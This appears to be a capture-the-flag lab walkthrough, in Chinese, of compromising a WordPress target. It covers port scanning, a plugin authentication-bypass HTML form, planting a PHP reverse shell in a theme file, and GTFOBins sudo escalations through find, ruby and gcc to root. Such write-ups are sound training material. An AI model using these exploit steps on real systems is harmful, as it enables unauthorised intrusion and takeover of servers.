kali:192.168.111.111
靶机:192.168.111.178
信息收集
端口扫描
nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.178
访问80端口发现存在一个目录
访问该目录发现是wordpress
wpscan扫描发现存在一个插件,和一个用户:wp-local
访问该连接http://192.168.111.178/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1,发现密码hackNos@9012!!
该插件存在越权
漏洞利用
访问该地址http://192.168.111.178/g@web/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/wpsp_getCatName.php,添加以下html代码
<body>
<form action="http://192.168.111.178/g@web/wp-admin/admin-ajax.php" method="post">
Username: <input type="text" name="username" value="administrator">
<input type="hidden" name="email" value="sth">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" name="">
</form>
</body>
输入框填入发现的wp-local用户名,之后点按钮提交
然后访问http://192.168.111.178/g@web/wp-admin进入后台
修改网站源码,写入kali自带的php反弹shel脚本/usr/share/webshells/php/php-reverse-shell.php
写入完成后访问http://192.168.111.178/g@web/wp-content/themes/twentyseventeen/404.php
提权
使用之前发现的密码hackNos@9012!!,切换到security用户,查看sudo -l
提权方法https://gtfobins.github.io/gtfobins/find/#sudo
输入命令sudo -u hackNos-boat find . -exec /bin/sh \; -quit,切换到hackNos-boat用户
hackNos-boat用户sudo -l
提权方法:https://gtfobins.github.io/gtfobins/ruby/#sudo
输入命令sudo -u hunter ruby -e 'exec "/bin/sh"',切换到hunter用户
hunter用户sudo -l
提权方法:https://gtfobins.github.io/gtfobins/gcc/#sudo
输入命令:sudo -u root gcc -wrapper /bin/sh,-s .,切换到root用户
获得flag
